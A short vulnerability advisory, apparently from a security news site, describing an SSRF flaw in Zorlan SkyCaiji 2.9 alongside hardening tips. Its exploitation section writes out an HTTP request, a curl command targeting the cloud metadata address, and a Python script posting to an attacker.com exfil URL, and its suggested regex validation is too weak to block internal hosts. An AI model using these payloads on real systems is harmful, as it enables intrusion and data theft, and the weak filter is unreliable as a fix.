Listen to this Post
How CVE-2025-1799 Works
The vulnerability in Zorlan SkyCaiji 2.9 arises from improper input validation in the `previewAction` function within vendor/skycaiji/app/admin/controller/Tool.php. Attackers can manipulate the `data` parameter to perform Server-Side Request Forgery (SSRF), forcing the server to make unauthorized HTTP requests to internal or external systems. This occurs due to insufficient sanitization of user-supplied URLs, allowing attackers to bypass access controls and interact with backend services, exfiltrate data, or escalate attacks to internal networks. The flaw is remotely exploitable with low complexity, requiring only a low-privileged account.
DailyCVE Form
Platform: Zorlan SkyCaiji
Version: 2.9
Vulnerability: SSRF
Severity: Critical
Date: 06/12/2025
Prediction: Patch by 07/15/2025
What Undercode Say:
Exploitation
1. Craft malicious payload:
POST /admin/tool/previewAction HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded data=http://internal-service/admin/export
2. Exploit via cURL:
curl -X POST "http://target.com/admin/tool/previewAction" -d "data=http://169.254.169.254/latest/meta-data"
3. Python SSRF script:
import requests
url = "http://target.com/admin/tool/previewAction"
payload = {"data": "http://attacker.com/exfil"}
requests.post(url, data=payload)
Protection
1. Input validation:
if (!preg_match('/^https?:\/\/[a-z0-9.-]+/', $data)) {
die("Invalid URL");
}
2. Network hardening:
iptables -A OUTPUT -d 169.254.169.254 -j DROP
3. Patch mitigation:
- $url = $_POST['data']; + $url = filter_var($_POST['data'], FILTER_VALIDATE_URL, FILTER_FLAG_SCHEME_REQUIRED);
4. Log monitoring:
grep "previewAction" /var/log/nginx/access.log | grep -v "allowed-domain.com"
5. WAF rule:
location /admin/tool {
if ($args ~ "data=http://(internal|169.254)") {
return 403;
}
}
6. Disable function:
// Comment or remove previewAction in Tool.php
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
